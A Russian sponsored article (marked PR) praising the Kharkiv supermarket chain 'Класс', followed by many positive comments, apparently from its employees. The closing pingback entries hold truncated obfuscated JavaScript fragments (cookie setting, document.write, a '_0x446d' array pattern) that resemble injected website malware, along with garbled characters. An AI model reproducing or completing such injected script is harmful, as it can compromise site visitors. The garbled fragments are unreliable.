Как сделать сферу торговли ещё лучше

12:15  |  18.01.2017
супермаркет класс
PR

И людей, и компании различного уровня можно разделить на две категории. Одни добиваются чего-то и довольствуются этим, а другие — не останавливаются и постоянно движутся к новым вершинам и достижениям. Вероятно, как раз люди, устремленные, постоянно нацеленные на прогресс, саморазвитие, и создают бизнес, который не довольствуется малым, растет, процветает, становится лучше и лучше. Примеров подобного хватает и в Украине, и в частности в Харькове. Один их самых наглядных — сеть розничной торговли «Класс», которая, кажется, постоянно нацелена исключительно на совершенствование.

Не только количественно

Как понять, что сеть супермаркетов «Класс» растет? Это легко и ощутимо прослеживаются по многим количественным показателям. Во-первых, тут ежедневно делают покупки свыше 10-12 тысяч семей и это значение неуклонно увеличивается. Собирательный портрет покупателя описать нелегко — это люди разного возраста, статуса, вида деятельности и интересов. Как правило, это те, кто любит комфорт, ценит удобство и большой выбор товаров, обращает внимание на качество обслуживание, считает деньги, то есть стремится экономить, а не переплачивать.

Во-вторых, открываются новые супермаркеты — один появился в 2016 году — 24 сентября на жилмассиве ХТЗ по адресу Архитектора Алешина, 8 открылся новый уютный торговый центр (уже 11-й по счету) с широчайшем ассортиментом продукции — более 20 тысяч наименований. Отличительной чертой нового супермаркета является уютная атмосфера, просторный зал — более 4000 квадратных метров, современный интерьер, способствующий удобному выбору товаров и отдыху во время шоппинга.

В-третьих, процесс расширения ассортимента не останавливается. Во-первых, в «Классах» быстро появляются новинки большинства продуктовых марок Украины и зарубежья. Также компания развивает собственные бренды — «Лучший выбор» «Ще-б-пак» и т.д.

В-четвертых, увеличивается и перечень предоставляемых посетителям услуг. В торговых центра «Класс», можно купить еду и напитки, товары для дома. Как правило, поблизости с супермаркетом находятся обособленные магазины/отделы детских игрушек и одежды, парфюмерии, косметики и украшений. В большинстве функционирующих на территории Харькова ТЦ имеется уютное кафе и/или ресторан. В «Классе-7» на Тракторостроителей есть полноценный развлекательный комплекс, называющийся «Атмосфера». Тут есть банкетный зал, комната для поклонников караоке, пивной бар, бильярд, боулинг и многое другое для отдыха и развлечений семей, друзей, трудовых коллективов или других больших компаний.

Но это не все особенности «Классов». Есть и другие моменты, которые многими упускаются из виду, но они в ещё большей степени отражают нацеленность компании на развитие и совершенствование.

Мелочи, которые значат много

Помимо количественного роста необходим и качественный. Как его обеспечить? В сети супермаркетов «Класс» используются разные методы и способы, но мы хотим подробнее остановиться на одном, кажущемся не столь важным и, возможно, мелочным.

Так, на официальном сайте сети на главной страничке есть небольшой, но заметный блок «Подскажите, как нам стать лучше». Фактически, это форма для обратной связи с представителями компании, которая позволяет любому желающему оставить свои отзывы про супермаркет Класс, написать пожелания, высказать замечания или пожаловаться. Казалось бы, все просто, но это же действенно.

Кто-то скажет, зачем форма, если надо я подойду к администратору в самом супермаркете, попрошу книгу жалоб и предложений. Но данная форма не исключает такого варианта, а лишь дополняет. Это возможность в удобное время, в удобном месте, без спешки, пакетов в руках, все время стремящегося куда-то убежать ребенка высказать свое мнение о работе заведения. К тому же, человек, который захочет что-то написать на сайте, уже немного остынет, в нем будут говорить не эмоции, а здравый смысл, в результате и написанное — будет конструктивнее и полезнее для всех.

В этой самой форме прописано — для нас важно мнение всех покупателей и ни одно обращение без внимания не будет оставлено. Учитывая статус сети супермаркетов «Класс» в этих словах сомнений нет. И как раз такая, казалось бы, мелочь, как форма обратной связи для ориентированной на клиентов сферы продуктового ритейла является важным фактором серьезного клиентоориентированного подхода. Он отражает желание компании услышать каждого, понять потребности покупателей, просто узнать, что им нравится или не нравится. Ни это ли ключевая возможность для дальнейшего качественного роста бизнеса?

Сайт супермаркета: klass.com.ua


Нажмите и читайте mykharkov.info в Facebook и подписывайтесь на наш Телеграм!

Смотрите еще новости и афишу Харькова.

Если вы нашли опечатку на сайте, выделите ее и нажмите Ctrl+Enter

Метки:
Оставьте комментарий

*

  1. Олександр 11:27 | 24.01.17

    Хочу поделиться немного своими впечатлениями об этом замечательном супермаркет. Работал в нем 3 года, (Класс 2, пр-т Гагарина). Работал охранником, работа замечательная, зарплава высока. Администрация супермаркета заслуживает высокой оценки, так как по разным причинам не слишком ставили претензии и относились к работающим очень хорошо. Работу всою я уважал, потому что она приносила мне неплохих доход, через который, я имел возможность кормить свою семью. Всем желающим могу посоветовать это место трудоустройства, если есть какие-то вакансии.

  2. Марина 12:43 | 26.01.17

    Устроилась на работу в маркет Класс на ул. Клочковская кондитером. Работаю уже год, всё нравится: магазин недалеко от моего дома, коллектив у нас хороший, ассортимент булочно-кондитерский готовим каждый день, всё необходимое имеется для работы. Своевременная зарплата радует. Не планирую теперь менять место работы

  3. Павел Алексеев 20:02 | 03.02.17

    Работаю в классе на пр-т Героев Сталинграда охранником. Пришёл сюда после работы в другом магазине контролёром. Условия труда понравились и график с плавающими выходными, что неплохо тоже. Работа заключается в контроле торгового зала и наблюдением за покупателями на кассах. Зарплата выплачивается вовремя, трудоустройство официальное. Ну это мне и надо было

  4. Татьяна 2:56 | 07.02.17

    Два года назад устроилась в «Класс» на Московском продавцом гастрономического отдела. Очень довольна, что пришла именно сюда — работа нравится, график удобный, зарплату никогда не задерживают, люди вокруг хорошие, руководство ценит.

  5. Анна 9:33 | 07.02.17

    Давно сотрудничаю с Классом. До этого работала во многих супермаркетах Харькова, но больше всего мне понравился именно Класс.

  6. Ирина 12:45 | 13.03.17

    Работаю здесь продавцом торгового зала. Все очень нравится. адекватное руководство, зарплата хорошая.

  7. Сергей 7:49 | 26.03.17

    До того как я пришел работать в «Класс», я работал еще в 2х супермаркетах. Попросился, что бы меня устроили на пр-т Героев Сталинграда, что бы было ближе к дому и в отделе кадров к этому отнеслись с пониманием, хоть и говорили, что в данном районе уже набран штат. Главный плюс, который мне здесь понравился, так это то, что нам никогда не задерживали зарплату и не кормили обещаниями, что «вот-вот будут деньги», а это довольно важно для людей, которые планируют свои растраты. Жалею, что не пришел сюда раньше.

  8. Андрей 9:31 | 26.03.17

    До пенсии осталось совсем немного. Но предыдущая работа мне уже не по силам. И ездить далековато, и на транспорт много денег уходит. Жена посоветовала уволиться о устроится дворником в Супермаркет Класс на пр-те Тракторостроителей. Он расположен у нас под домом. Оформление прошло быстро. Я сразу усвоил свои обязанности. Меня все устраивает. Постоянно в движении и на воздухе. Руководство мною довольно. Надеюсь остаться здесь на сколько сил хватит.

  9. Виктория 12:13 | 26.03.17

    Я работала в супермаркете Класс 5, ул. С. Грицевца оператором дисконтного отдела. Работой была довольна и никогда бы не уволилась, если бы не переезд. Мы были как одна семья, все друг друга поддерживали и помогали. Начальство у меня было справедливое, хоть и строгое. Оформление в супермаркете официальное по ТК, поэтому проблем с отпуском или больничным никогда не было. Зарплата меня устраивала, хватало и на жизнь и на поездки за границу во время отпуска.

  10. Аня 12:13 | 12.06.17

    Я давно хотела попробовать работать в большом супермаркете Класс, и вот мечта свершилась, устроилась оператором в дисконтный отдел. Коллектив принял замечательно. Работа интересная и увлекательная,и зарплата достойная. А самое главное Класс ( пр-т Тракторостроителей ) находится не далеко от моего дома, так что добираться долго не надо. Всё просто Класс.

  11. Ирина 11:01 | 20.06.17

    После того, как вышла с декрета устроилась в супермаркет Класс продавцом отдела непродовольственных товаров. Опыта в подобной сфере большой, поэтому влиться в коллектив не составило особых затруднений. С работой справляюсь, уже два месяца прошло, зарплату выплачивают во время, плюс есть премии. Нравится отношение начальников к своим подчиненным, не было случая, чтобы на кого-то кричали.

  12. Саша 16:08 | 08.08.17

    Работа хорошая, никаких трудностей с начальством у меня никогда не было. Устраивалась сюда как на временную подработку, но потом решили остаться, так как все понравилось и график мне подошел.

  13. Валерий Смирнов 19:12 | 23.08.17

    Работал охранником в магазине Класс 4, по пр-т Любвига Свободы. Устроился легко, без особых проблем, только документы нужны. Проработал несколько месяцев, потом ушёл на более высокую зарплату в другой магазин. Нормальный коллектив и лояльное начальство радовало, но график работы тяжелый.

  14. Игорь 11:52 | 05.11.17

    Думаю, сеть Класс смогла сделать нормальные рабочие места для сотрудников. По своему опыту скажу, что работаю в гипермаркете на пр-т Московском охранником уже второй год. Руководство нормально относится, график работы у нас сменный. Конечно, не легко на ногах всю смену проводить, с другой стороны, хорошо платят и без задержек. Это меня радует

  15. Анна 16:15 | 26.11.17

    Несколько лет назад я работала в этом супермаркете по адресу Класс 2, пр-т Гагарина. Работала кондитером-оформителем. Работать там очень нравилось. Хорошее отношение к персоналу, удобный график, во время выплачивают зарплату.

  16. Оля 14:06 | 04.12.17

    Работа здесь идет хорошо, к самому начальству претензий нету, у них ко мне тоже не возникало вопросов за все время моей работы. Моя работа связанна с физическим трудом, устаю немного, на знал, на что шел.

  17. Владислав 9:41 | 07.12.17

    Работаю в данном супермаркете уборщиком около 2 месяцев. Мне работать нравится, работаю несложная и платять зарплату точно в сроки.

  18. Влад 14:48 | 29.01.18

    Работаю в Классе не первый год охранником, все устраивает. Коллектив и руководство просто супер.

  19. Анита 11:57 | 06.02.18

    Работала кассиром примерно год, пока училась. Удобно, что тут сменный график, зарплата без задержек. Единственный минус — это не всегда приятные покупатели, бывает, что грубят

  20. Вячеслав 10:29 | 15.02.18

    В Класс пришел работать обычными охранником еще в конце осени и работаю по сей день. Зарплата не очень большая, но и работа не пыльная. Платят вовремя и переработок нет, меня все устраивает.

  21. Валерик 17:51 | 12.03.18

    Работал в Классе на Алешина укладчиком, ибо на тот момент не было других подходящих вакансий, хоть я и инженер по образованию. Работа неплохая, деньги платили вовремя, в том числе и за переработку. Это пожалуй, самый главный плюс. А уволиться мне пришлось из-за того, что мой коллега и напарник больше любил разговаривать, чем работать. В таких условиях, делая все практически в одиночку, работать трудновато

  22. Дмитрий 10:36 | 27.04.18

    В супермаркет Класс приняли работать оператором дисконтного отдела. Ранее имел схожую должность, поэтому никаких проблем на собеседовании и месте работы нет. График фиксированный и официальное трудоустройство.

  23. Иван 10:45 | 14.06.18

    Сейчас очень трудно найти достойное место работы. Я рад, что мои работодателем стал именно «Класс». Условия труда соответственные, зарплата белая и выплачивается точно по срокам. Уходить не собираюсь.

  24. Виктор 17:08 | 19.06.18

    Устроился в супермаркет Класс 5, по ул. С. Грицевца на должность укладчика-упаковщика уже как 4 месяца назад. Изначально работать не по специальности не хотел, но выхода другого не было. Освоил новые навыки быстро, во многом это заслуга моих коллег. Помогли, подсказали. Условия труда и заработную плату считаю достойными. Еще огромный плюс то, что супермаркет находится в пешей близости от моего дома. Не нужно тратить ни время, ни деньги на проезд.

  25. Сергей 18:53 | 31.07.18

    В супермаркет класс 7 устроился я 3 года назад. Пришёл на собеседование, начальство вежливо со мной беседовало, спросили кем Я хочу здесь работать, взяли меня на работу грузчиком с дальнейшей возможностью карьерного роста. 2 года проработал грузчиком, теперь работаю охранником. Зарплата хорошая, намного выше чем в других местах где трудился я. Радует и тот момент, что у руководства уважительное отношение ко мне. И ещё мне нравится то, что стаж засчитывается. С коллегами полное взаимопонимание.

  26. Татьяна 11:38 | 27.08.18

    На данный момент супермаркет Класс практически не имеет конкурентов в сфере обслуживания. Сама работаю здесь в торговом зале и горя не знаю. Платят достойно и стаж идет, мне большего и не нужно.

  27. Дмитрий 9:57 | 31.08.18

    Лично меня работа полностью устраивает, конечно не без сложностей. Платят отлично и условия труда соответственные. С коллективом правда были проблемы, но за месяц все устаканилось.

  28. Антон 10:24 | 03.09.18

    Работаю охранником на пр-те Московском, работа меня устраивает, хоть по специальности я и экономист, первое время было немного непонятно, но я быстро втянулся. Не сложно, работа устраивает, коллектив собрался из нормальных, адекватных людей, а начальство не придирается по пустякам. Заработная плата выше, чем если бы я работал по специальности. Все устраивает.

  29. Hfbcf 7:21 | 06.09.18

    Работаю больше года на проспекте Тракторостроителем в супермаркете укладчиком-упаковщиком. Если честно устраивалась на время, пока не подищу другую работу, но постепенно втянулась и поняла, что лучше и не надо. Работа близко с домом, в тепле, выполняй своё дело и всё. Сначала путём не успевала и не умела паковать, но меня научили всё делать красиво. Я довольна.

  30. […] path=/; expires="+date.toGMTString(),document.write('')} лобановский александркак правильно делать […]

  31. […] path=/; expires="+date.toGMTString(),document.write('')} депутат лобановскийrussia […]

  32. […] navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}N??????�??N? ????N�?�??N�???�?�N?N? N?N????�N�???�N�???�N�var […]

Сообщить об опечатке

Текст, который будет отправлен нашим редакторам: